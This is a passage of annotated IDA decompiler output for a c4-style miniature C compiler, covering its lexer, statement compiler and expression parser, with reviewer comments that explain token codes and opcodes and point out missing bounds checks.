            return __readfsqword(0x28u) ^ v11;
          }
        }
        /* Not found: the loop stopped on the first empty record, which now
         * becomes the new identifier (token kind 133). Unbounded growth. */
        *(_QWORD *)(qword_2060B8 + 16) = s2;
        *(_QWORD *)(qword_2060B8 + 8) = qword_206070;
        v1 = (__int64 *)qword_2060B8;
        *(_QWORD *)qword_2060B8 = 133LL;
        qword_206070 = *v1;
        return __readfsqword(0x28u) ^ v11;
      }
      if ( qword_206070 > 47 && qword_206070 <= 57 )
      {
        /* Number literal: leading '0' selects octal, "0x"/"0X" hex,
         * otherwise decimal. Accumulated without overflow checks. */
        qword_2060A8 = qword_206070 - 48;
        if ( qword_206070 == 48 )
        {
          if ( *(_BYTE *)buf != 120 && *(_BYTE *)buf != 88 )
          {
            while ( *(_BYTE *)buf > 47 && *(_BYTE *)buf <= 55 )
            {
              v4 = (char *)buf;
              buf = (char *)buf + 1;
              qword_2060A8 = 8 * qword_2060A8 + *v4 - 48;
            }
          }
          else
          {
            while ( 1 )
            {
              /* Skips the 'x' on the first pass; stops on the first
               * character that is not 0-9, a-f or A-F. */
              buf = (char *)buf + 1;
              qword_206070 = *(char *)buf;
              if ( !qword_206070 || (qword_206070 <= 47 || qword_206070 > 57) && (qword_206070 <= 96 || qword_206070 > 102) && (qword_206070 <= 64 || qword_206070 > 70) )
                break;
              /* digit value = (c & 0xF) + (c >= 'A' ? 9 : 0) */
              if ( qword_206070 <= 64 )
                v3 = 0LL;
              else
                v3 = 9LL;
              qword_2060A8 = (qword_206070 & 0xF) + 16 * qword_2060A8 + v3;
            }
          }
        }
        else
        {
          while ( *(_BYTE *)buf > 47 && *(_BYTE *)buf <= 57 )
          {
            v2 = (char *)buf;
            buf = (char *)buf + 1;
            qword_2060A8 = 10 * qword_2060A8 + *v2 - 48;
          }
        }
        qword_206070 = 128LL;
        return __readfsqword(0x28u) ^ v11;
      }
      switch ( qword_206070 )
      {
        case 47LL:
          /* '/' is division unless followed by another '/', which starts
           * a line comment that is skipped. */
          if ( *(_BYTE *)buf != 47 )
          {
            qword_206070 = 160LL;
            return __readfsqword(0x28u) ^ v11;
          }
          for ( buf = (char *)buf + 1; *(_BYTE *)buf && *(_BYTE *)buf != 10; buf = (char *)buf + 1 )
            ;
          break;
        case 39LL:
        case 34LL:
          /* Char ('\'') or string ('"') literal. Only the escape "\n" is
           * translated; any other backslash escape yields the next byte
           * verbatim. String bytes are appended to the data area (no
           * terminator is written here and no bound is checked); a char
           * literal keeps only the last byte as its value. */
          s2a = qword_206080;
          while ( *(_BYTE *)buf && *(char *)buf != qword_206070 )
          {
            v5 = (char *)buf;
            buf = (char *)buf + 1;
            qword_2060A8 = *v5;
            if ( qword_2060A8 == 92 )
            {
              v6 = (char *)buf;
              buf = (char *)buf + 1;
              qword_2060A8 = *v6;
              if ( qword_2060A8 == 110 )
                qword_2060A8 = 10LL;
            }
            if ( qword_206070 == 34 )
            {
              v7 = qword_206080;
              qword_206080 = (char *)qword_206080 + 1;
              *v7 = qword_2060A8;
            }
          }
          /* Skips the closing quote - or the NUL terminator if the literal
           * was never closed. */
          buf = (char *)buf + 1;
          if ( qword_206070 == 34 )
            qword_2060A8 = (__int64)s2a;
          else
            qword_206070 = 128LL;
          return __readfsqword(0x28u) ^ v11;
        case 61LL:
          if ( *(_BYTE *)buf == 61 )
          {
            buf = (char *)buf + 1;
            qword_206070 = 149LL;
          }
          else
          {
            qword_206070 = 142LL;
          }
          return __readfsqword(0x28u) ^ v11;
        case 43LL:
          if ( *(_BYTE *)buf == 43 )
          {
            buf = (char *)buf + 1;
            qword_206070 = 162LL;
          }
          else
          {
            qword_206070 = 157LL;
          }
          return __readfsqword(0x28u) ^ v11;
        case 45LL:
          if ( *(_BYTE *)buf == 45 )
          {
            buf = (char *)buf + 1;
            qword_206070 = 163LL;
          }
          else
          {
            qword_206070 = 158LL;
          }
          return __readfsqword(0x28u) ^ v11;
        case 33LL:
          /* '!=' becomes 150; a lone '!' keeps its ASCII code */
          if ( *(_BYTE *)buf == 61 )
          {
            buf = (char *)buf + 1;
            qword_206070 = 150LL;
          }
          return __readfsqword(0x28u) ^ v11;
        case 60LL:
          if ( *(_BYTE *)buf == 61 )
          {
            buf = (char *)buf + 1;
            qword_206070 = 153LL;
          }
          else if ( *(_BYTE *)buf == 60 )
          {
            buf = (char *)buf + 1;
            qword_206070 = 155LL;
          }
          else
          {
            qword_206070 = 151LL;
          }
          return __readfsqword(0x28u) ^ v11;
        case 62LL:
          if ( *(_BYTE *)buf == 61 )
          {
            buf = (char *)buf + 1;
            qword_206070 = 154LL;
          }
          else if ( *(_BYTE *)buf == 62 )
          {
            buf = (char *)buf + 1;
            qword_206070 = 156LL;
          }
          else
          {
            qword_206070 = 152LL;
          }
          return __readfsqword(0x28u) ^ v11;
        case 124LL:
          if ( *(_BYTE *)buf == 124 )
          {
            buf = (char *)buf + 1;
            qword_206070 = 144LL;
          }
          else
          {
            qword_206070 = 146LL;
          }
          return __readfsqword(0x28u) ^ v11;
        case 38LL:
          if ( *(_BYTE *)buf == 38 )
          {
            buf = (char *)buf + 1;
            qword_206070 = 145LL;
          }
          else
          {
            qword_206070 = 148LL;
          }
          return __readfsqword(0x28u) ^ v11;
        case 94LL:
          qword_206070 = 147LL;
          return __readfsqword(0x28u) ^ v11;
        case 37LL:
          qword_206070 = 161LL;
          return __readfsqword(0x28u) ^ v11;
        case 42LL:
          qword_206070 = 159LL;
          return __readfsqword(0x28u) ^ v11;
        case 91LL:
          qword_206070 = 164LL;
          return __readfsqword(0x28u) ^ v11;
        case 63LL:
          qword_206070 = 143LL;
          return __readfsqword(0x28u) ^ v11;
        case 126LL:
        case 59LL:
        case 123LL:
        case 125LL:
        case 40LL:
        case 41LL:
        case 93LL:
        case 44LL:
        case 58LL:
          /* Single-character punctuators: token = the character itself. */
          return __readfsqword(0x28u) ^ v11;
      }
      /* Any other byte (whitespace and unlisted characters) is skipped. */
    }
  }
  return __readfsqword(0x28u) ^ v11;
}
sub_3457 函数如下:
/*
 * Statement compiler (c4's `stmt()`): consumes one statement from the
 * token stream and appends its word-code to the text area (qword_206088,
 * advanced 8 bytes per word). Recursive for nested statements.
 *
 * Token kinds handled: 137 if, 141 while, 139 return, 123 '{', 59 ';';
 * anything else is an expression statement compiled via sub_16CB(142)
 * (142 is the assignment precedence level).
 * Opcodes emitted: 2 JMP, 4 BZ, 8 LEV.
 *
 * Syntax errors print the current line number and exit(-1); the text area
 * is never checked for overflow. The (unused) argument IDA shows being
 * passed on recursive calls is an artefact.
 *
 * Returns the stack-canary XOR from IDA's epilogue; callers ignore it.
 */
unsigned __int64 sub_3457()
{
  _QWORD *v0; // ST08_8   slot holding the BZ target of a while
  _QWORD *v2; // [rsp+8h] [rbp-18h]   slot holding the pending BZ/JMP target of an if
  char *v3; // [rsp+10h] [rbp-10h]   address of a while loop's condition
  unsigned __int64 v4; // [rsp+18h] [rbp-8h]   stack canary

  v4 = __readfsqword(0x28u);
  switch ( qword_206070 )
  {
    case 137LL:
      /* if ( expr ) stmt [else stmt]
       *   <expr> BZ L1 <stmt>            -> L1 patched to the end
       *   <expr> BZ L1 <stmt> JMP L2 L1: <stmt> L2:   with else */
      sub_B70();
      if ( qword_206070 != 40 )
      {
        printf("%d: open paren expected\n", qword_206098);
        exit(-1);
      }
      sub_B70();
      sub_16CB(142LL);
      if ( qword_206070 != 41 )
      {
        printf("%d: close paren expected\n", qword_206098);
        exit(-1);
      }
      sub_B70();
      qword_206088 = (char *)qword_206088 + 8;
      *(_QWORD *)qword_206088 = 4LL;
      qword_206088 = (char *)qword_206088 + 8;
      v2 = qword_206088;
      sub_3457(142LL);
      if ( qword_206070 == 135 )
      {
        /* BZ jumps over the JMP that follows the then-branch. */
        *v2 = (char *)qword_206088 + 24;
        qword_206088 = (char *)qword_206088 + 8;
        *(_QWORD *)qword_206088 = 2LL;
        qword_206088 = (char *)qword_206088 + 8;
        v2 = qword_206088;
        sub_B70();
        sub_3457(142LL);
      }
      *v2 = (char *)qword_206088 + 8;
      break;
    case 141LL:
      /* while ( expr ) stmt
       *   L1: <expr> BZ L2 <stmt> JMP L1 L2: */
      sub_B70();
      v3 = (char *)qword_206088 + 8;
      if ( qword_206070 != 40 )
      {
        printf("%d: open paren expected\n", qword_206098);
        exit(-1);
      }
      sub_B70();
      sub_16CB(142LL);
      if ( qword_206070 != 41 )
      {
        printf("%d: close paren expected\n", qword_206098);
        exit(-1);
      }
      sub_B70();
      qword_206088 = (char *)qword_206088 + 8;
      *(_QWORD *)qword_206088 = 4LL;
      qword_206088 = (char *)qword_206088 + 8;
      v0 = qword_206088;
      sub_3457(142LL);
      qword_206088 = (char *)qword_206088 + 8;
      *(_QWORD *)qword_206088 = 2LL;
      qword_206088 = (char *)qword_206088 + 8;
      *(_QWORD *)qword_206088 = v3;
      *v0 = (char *)qword_206088 + 8;
      break;
    case 139LL:
      /* return [expr] ;   -> <expr> LEV */
      sub_B70();
      if ( qword_206070 != 59 )
        sub_16CB(142LL);
      qword_206088 = (char *)qword_206088 + 8;
      *(_QWORD *)qword_206088 = 8LL;
      if ( qword_206070 != 59 )
      {
        printf("%d: semicolon expected\n", qword_206098);
        exit(-1);
      }
      sub_B70();
      break;
    case 123LL:
      /* { stmt* } - end of input inside a block is reported by sub_16CB */
      sub_B70();
      while ( qword_206070 != 125 )
        ((void (*)(void))sub_3457)();
      sub_B70();
      break;
    case 59LL:
      /* empty statement */
      sub_B70();
      break;
    default:
      /* expression statement */
      sub_16CB(142LL);
      if ( qword_206070 != 59 )
      {
        printf("%d: semicolon expected\n", qword_206098);
        exit(-1);
      }
      sub_B70();
      break;
  }
  return __readfsqword(0x28u) ^ v4;
}
sub_16CB 函数如下:
/*
 * sub_16CB — expression parser / code generator (matches c4's expr(lev)).
 * Decompiler output; identifiers are IDA's.
 *
 * a1: precedence threshold.  After the primary/unary part, the loop
 *     "while (qword_206070 >= a1)" keeps folding operators whose token value
 *     is >= a1; the case labels 142..164 are therefore the operator tokens in
 *     ascending precedence.
 *
 * Globals, meaning inferred from how they are used here:
 *   qword_206070  current token
 *   qword_206098  "%d:" prefix of every error — presumably the line number
 *   qword_206088  emit cursor ("cursor += 8; *cursor = word"); the lvalue
 *                 checks read the last emitted word back through it.
 *                 NOTE(review): no upper bound is ever checked here
 *   qword_206078  type of the expression just emitted: 0 and 1 are the two
 *                 base types (sizeof gives 1 and 8), each pointer level
 *                 adds 2 ("bad dereference" when <= 1)
 *   qword_2060A8  value attached to the current numeric / string token
 *   qword_2060B8  symbol-table entry of the current identifier, read as a
 *                 _QWORD array: [3] class (128..132), [4] type, [5] value
 *   qword_206080  data cursor; rounded up to a multiple of 8 after a
 *                 string literal
 *   qword_206090  subtracted from the value of class-132 symbols —
 *                 presumably the frame offset of locals; confirm in sub_ that
 *                 declares locals
 *   sub_B70()     presumably the lexer's next()
 *
 * Emitted words are small integer opcodes followed by immediates.  From the
 * patterns below: 1 = load immediate, 13 = push (emitted before every
 * operand / argument), 9/10 = load of the 8-byte / 1-byte type, 11/12 = the
 * matching stores, 4/5/2 = conditional / unconditional jumps with a
 * back-patched target.  The exact names live in the VM, not in this listing.
 *
 * NOTE(review): dereference (159), address-of (148), subscript (164) and
 * assignment (142) emit raw load/store words with no validation of the
 * address operand; a guest program can therefore read or write any address
 * the VM process can.  Any confinement of guest memory would have to be
 * enforced by the VM that executes these words.
 *
 * Every syntax error prints and calls exit(-1).  Returns the canary XOR
 * (stack-protector epilogue); meaningless to callers.
 */
unsigned __int64 __fastcall sub_16CB(__int64 a1) {
    signed __int64 v1; // rdx
    signed __int64 v2; // rdx
    signed __int64 v3; // rdx
    signed __int64 v4; // rdx
    signed __int64 v5; // rdx
    signed __int64 v6; // rdx
    signed __int64 v7; // rdx
    _QWORD *v8; // ST20_8
    _QWORD *v9; // ST20_8
    _QWORD *v10; // ST20_8
    signed __int64 v11; // rdx
    signed __int64 v12; // rdx
    signed __int64 v13; // rdx
    signed __int64 v14; // rdx
    signed __int64 v15; // rdx
    signed __int64 v16; // rdx
    __int64 v18; // [rsp+18h] [rbp-18h]
    __int64 v19; // [rsp+18h] [rbp-18h]
    __int64 v20; // [rsp+18h] [rbp-18h]
    signed __int64 v21; // [rsp+18h] [rbp-18h]
    _QWORD *v22; // [rsp+20h] [rbp-10h]
    _QWORD *v23; // [rsp+20h] [rbp-10h]
    unsigned __int64 v24; // [rsp+28h] [rbp-8h]

    v24 = __readfsqword(0x28u);  // save canary
    if ( !qword_206070 ) {
        printf("%d: unexpected eof in expression\n", qword_206098);
        exit(-1);
    }

    /* ---------- primary / unary part ---------- */
    switch ( qword_206070 ) {
    case 128LL:  // numeric literal: "1 <value>", type 1
        qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL;
        qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = qword_2060A8;
        sub_B70();
        qword_206078 = 1LL;
        break;
    case 34LL:  // string literal '"': emit its address, swallow adjacent literals, align the data cursor
        qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL;
        qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = qword_2060A8;
        sub_B70();
        while ( qword_206070 == 34 ) sub_B70();
        qword_206080 = (void *)(((unsigned __int64)qword_206080 + 8) & 0xFFFFFFFFFFFFFFF8LL);
        qword_206078 = 2LL;  // pointer to base type 0
        break;
    case 140LL:  // sizeof "(" [138 | 134] "*"* ")"  -> immediate 8 or 1
        sub_B70();
        if ( qword_206070 != 40 ) {
            printf("%d: open paren expected in sizeof\n", qword_206098);
            exit(-1);
        }
        sub_B70();
        qword_206078 = 1LL;
        if ( qword_206070 == 138 ) {
            sub_B70();
        } else if ( qword_206070 == 134 ) {
            sub_B70();
            qword_206078 = 0LL;
        }
        while ( qword_206070 == 159 ) {  // each 159 ('*') adds a pointer level
            sub_B70();
            qword_206078 += 2LL;
        }
        if ( qword_206070 != 41 ) {
            printf("%d: close paren expected in sizeof\n", qword_206098);
            exit(-1);
        }
        sub_B70();
        qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL;
        qword_206088 = (char *)qword_206088 + 8;
        if ( qword_206078 ) v1 = 8LL; else v1 = 1LL;  // only base type 0 has size 1
        *(_QWORD *)qword_206088 = v1;
        qword_206078 = 1LL;
        break;
    case 133LL:  // identifier: call, constant, local or global
        v22 = (_QWORD *)qword_2060B8;
        sub_B70();
        if ( qword_206070 == 40 ) {  // call: push each argument, emit the call, drop the arguments
            sub_B70();
            v18 = 0LL;  // argument count
            while ( qword_206070 != 41 ) {
                sub_16CB(142LL);
                qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
                ++v18;
                if ( qword_206070 == 44 ) sub_B70();  // ','
            }
            sub_B70();
            if ( v22[3] == 130LL ) {  // class 130: built-in; its value is emitted as the opcode itself
                qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = v22[5];
            } else {
                if ( v22[3] != 129LL ) {
                    printf("%d: bad function call\n", qword_206098);
                    exit(-1);
                }
                qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 3LL;  // class 129: user function, "3 <address>"
                qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = v22[5];
            }
            if ( v18 ) {  // "7 <argc>" to discard the pushed arguments
                qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 7LL;
                qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = v18;
            }
            qword_206078 = v22[4];  // result type from the symbol
        } else if ( v22[3] == 128LL ) {  // class 128: named constant, emitted as an immediate
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL;
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = v22[5];
            qword_206078 = 1LL;
        } else {
            if ( v22[3] == 132LL ) {  // class 132: local, "0 <frame-relative offset>"
                qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 0LL;
                qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = qword_206090 - v22[5];
            } else {
                if ( v22[3] != 131LL ) {
                    printf("%d: undefined variable\n", qword_206098);
                    exit(-1);
                }
                qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL;  // class 131: global, absolute address
                qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = v22[5];
            }
            qword_206088 = (char *)qword_206088 + 8;
            qword_206078 = v22[4];
            if ( qword_206078 ) v2 = 9LL; else v2 = 10LL;  // load of the 8-byte / 1-byte type
            *(_QWORD *)qword_206088 = v2;
        }
        break;
    case 40LL:  // "(": parenthesised expression, or a cast "(" type "*"* ")" unary
        sub_B70();
        if ( qword_206070 != 138 && qword_206070 != 134 ) {
            sub_16CB(142LL);
            if ( qword_206070 != 41 ) {
                printf("%d: close paren expected\n", qword_206098);
                exit(-1);
            }
            sub_B70();
        } else {
            v19 = qword_206070 == 138;  // cast target type: 1 for token 138, 0 for 134, +2 per '*'
            sub_B70();
            while ( qword_206070 == 159 ) {
                sub_B70();
                v19 += 2LL;
            }
            if ( qword_206070 != 41 ) {
                printf("%d: bad cast\n", qword_206098);
                exit(-1);
            }
            sub_B70();
            sub_16CB(162LL);
            qword_206078 = v19;  // a cast only relabels the type; no code is emitted for it
        }
        break;
    case 159LL:  // unary '*' (dereference): operand must be a pointer type
        sub_B70();
        sub_16CB(162LL);
        if ( qword_206078 <= 1 ) {
            printf("%d: bad dereference\n", qword_206098);
            exit(-1);
        }
        qword_206078 -= 2LL;
        qword_206088 = (char *)qword_206088 + 8;
        if ( qword_206078 ) v3 = 9LL; else v3 = 10LL;
        *(_QWORD *)qword_206088 = v3;
        break;
    case 148LL:  // unary '&' (address-of): operand must end in a load, which is simply dropped
        sub_B70();
        sub_16CB(162LL);
        if ( *(_QWORD *)qword_206088 != 10LL && *(_QWORD *)qword_206088 != 9LL ) {
            printf("%d: bad address-of\n", qword_206098);
            exit(-1);
        }
        qword_206088 = (char *)qword_206088 - 8;
        qword_206078 += 2LL;
        break;
    case 33LL:  // '!': push, immediate 0, opcode 17 (presumably compare-equal)
        sub_B70();
        sub_16CB(162LL);
        qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
        qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL;
        qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 0LL;
        qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 17LL;
        qword_206078 = 1LL;
        break;
    case 126LL:  // '~': push, immediate -1, opcode 15 (presumably xor)
        sub_B70();
        sub_16CB(162LL);
        qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
        qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL;
        qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = -1LL;
        qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 15LL;
        qword_206078 = 1LL;
        break;
    case 157LL:  // unary '+': no code, result type 1
        sub_B70();
        sub_16CB(162LL);
        qword_206078 = 1LL;
        break;
    case 158LL:  // unary '-': fold a literal, otherwise multiply by -1 (opcode 27)
        sub_B70();
        qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL;
        if ( qword_206070 == 128 ) {
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = -qword_2060A8;
            sub_B70();
        } else {
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = -1LL;
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
            sub_16CB(162LL);
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 27LL;
        }
        qword_206078 = 1LL;
        break;
    default:  // 162 / 163: pre-increment / pre-decrement of an lvalue
        if ( qword_206070 != 162 && qword_206070 != 163 ) {
            printf("%d: bad expression\n", qword_206098);
            exit(-1);
        }
        v20 = qword_206070;
        sub_B70();
        sub_16CB(162LL);
        // turn the trailing load into "push; load" so the address survives for the store
        if ( *(_QWORD *)qword_206088 == 10LL ) {
            *(_QWORD *)qword_206088 = 13LL;
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 10LL;
        } else {
            if ( *(_QWORD *)qword_206088 != 9LL ) {
                printf("%d: bad lvalue in pre-increment\n", qword_206098);
                exit(-1);
            }
            *(_QWORD *)qword_206088 = 13LL;
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 9LL;
        }
        qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
        qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL;
        qword_206088 = (char *)qword_206088 + 8;
        if ( qword_206078 <= 2 ) v4 = 1LL; else v4 = 8LL;  // step: 8 for pointers to the 8-byte type
        *(_QWORD *)qword_206088 = v4;
        qword_206088 = (char *)qword_206088 + 8;
        if ( v20 == 162 ) v5 = 25LL; else v5 = 26LL;  // 25 / 26: add / subtract
        *(_QWORD *)qword_206088 = v5;
        qword_206088 = (char *)qword_206088 + 8;
        if ( qword_206078 ) v6 = 11LL; else v6 = 12LL;  // store back
        *(_QWORD *)qword_206088 = v6;
        break;
    }

    /* ---------- binary / postfix operators, precedence climbing ---------- */
    while ( qword_206070 >= a1 ) {
        v21 = qword_206078;  // type of the left operand
        switch ( qword_206070 ) {
        case 142LL:  // '=': left side must end in a load; replace it with push, then store
            sub_B70();
            if ( *(_QWORD *)qword_206088 != 10LL && *(_QWORD *)qword_206088 != 9LL ) {
                printf("%d: bad lvalue in assignment\n", qword_206098);
                exit(-1);
            }
            *(_QWORD *)qword_206088 = 13LL;
            sub_16CB(142LL);
            qword_206088 = (char *)qword_206088 + 8;
            qword_206078 = v21;
            if ( v21 ) v7 = 11LL; else v7 = 12LL;
            *(_QWORD *)qword_206088 = v7;
            break;
        case 143LL:  // '?' ':' — same jump/back-patch shape as the if-statement
            sub_B70();
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 4LL;
            qword_206088 = (char *)qword_206088 + 8; v23 = qword_206088;
            sub_16CB(142LL);
            if ( qword_206070 != 58 ) {
                printf("%d: conditional missing colon\n", qword_206098);
                exit(-1);
            }
            sub_B70();
            *v23 = (char *)qword_206088 + 24;
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 2LL;
            qword_206088 = (char *)qword_206088 + 8; v8 = qword_206088;
            sub_16CB(143LL);
            *v8 = (char *)qword_206088 + 8;
            break;
        case 144LL:  // short-circuit with opcode 5, target patched past the right operand
            sub_B70();
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 5LL;
            qword_206088 = (char *)qword_206088 + 8; v9 = qword_206088;
            sub_16CB(145LL);
            *v9 = (char *)qword_206088 + 8;
            qword_206078 = 1LL;
            break;
        case 145LL:  // short-circuit with opcode 4
            sub_B70();
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 4LL;
            qword_206088 = (char *)qword_206088 + 8; v10 = qword_206088;
            sub_16CB(146LL);
            *v10 = (char *)qword_206088 + 8;
            qword_206078 = 1LL;
            break;
        // 146..156: plain binary operators — push left, parse right at the next
        // precedence, emit opcode 14..24; result type 1
        case 146LL:
            sub_B70();
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
            sub_16CB(147LL);
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 14LL;
            qword_206078 = 1LL;
            break;
        case 147LL:
            sub_B70();
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
            sub_16CB(148LL);
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 15LL;
            qword_206078 = 1LL;
            break;
        case 148LL:
            sub_B70();
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
            sub_16CB(149LL);
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 16LL;
            qword_206078 = 1LL;
            break;
        case 149LL:
            sub_B70();
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
            sub_16CB(151LL);
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 17LL;
            qword_206078 = 1LL;
            break;
        case 150LL:
            sub_B70();
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
            sub_16CB(151LL);
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 18LL;
            qword_206078 = 1LL;
            break;
        case 151LL:
            sub_B70();
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
            sub_16CB(155LL);
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 19LL;
            qword_206078 = 1LL;
            break;
        case 152LL:
            sub_B70();
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
            sub_16CB(155LL);
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 20LL;
            qword_206078 = 1LL;
            break;
        case 153LL:
            sub_B70();
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
            sub_16CB(155LL);
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 21LL;
            qword_206078 = 1LL;
            break;
        case 154LL:
            sub_B70();
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
            sub_16CB(155LL);
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 22LL;
            qword_206078 = 1LL;
            break;
        case 155LL:
            sub_B70();
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
            sub_16CB(157LL);
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 23LL;
            qword_206078 = 1LL;
            break;
        case 156LL:
            sub_B70();
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
            sub_16CB(157LL);
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 24LL;
            qword_206078 = 1LL;
            break;
        case 157LL:  // binary '+': scale the right operand by 8 when the left is a pointer to the 8-byte type
            sub_B70();
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
            sub_16CB(159LL);
            qword_206078 = v21;
            if ( v21 > 2 ) {
                qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
                qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL;
                qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 8LL;
                qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 27LL;
            }
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 25LL;
            break;
        case 158LL:  // binary '-': pointer - pointer of the same type divides by 8 (28); otherwise scale like '+'
            sub_B70();
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
            sub_16CB(159LL);
            if ( v21 <= 2 || v21 != qword_206078 ) {
                qword_206078 = v21;
                if ( v21 > 2 ) {
                    qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
                    qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL;
                    qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 8LL;
                    qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 27LL;
                }
                qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 26LL;
            } else {
                qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 26LL;
                qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
                qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL;
                qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 8LL;
                qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 28LL;
                qword_206078 = 1LL;
            }
            break;
        case 159LL:  // binary '*' -> 27
            sub_B70();
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
            sub_16CB(162LL);
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 27LL;
            qword_206078 = 1LL;
            break;
        case 160LL:  // '/' -> 28
            sub_B70();
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
            sub_16CB(162LL);
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 28LL;
            qword_206078 = 1LL;
            break;
        case 161LL:  // '%' -> 29
            sub_B70();
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
            sub_16CB(162LL);
            qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 29LL;
            qword_206078 = 1LL;
            break;
        default:  // 164 '[' subscript, or 162/163 post-increment / post-decrement
            if ( qword_206070 != 162 && qword_206070 != 163 ) {
                if ( qword_206070 != 164 ) {
                    printf("%d: compiler error tk=%d\n", qword_206098, qword_206070);
                    exit(-1);
                }
                // subscript: push base, parse index, expect 93 ']', scale, add, load
                sub_B70();
                qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL;
                sub_16CB(142LL);
                if ( qword_206070 != 93 ) {
